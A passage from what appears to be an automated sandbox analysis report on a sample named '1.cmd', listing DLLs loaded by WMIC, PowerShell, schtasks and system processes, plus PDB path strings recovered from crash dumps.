Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 1.cmdStatic file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

barindex
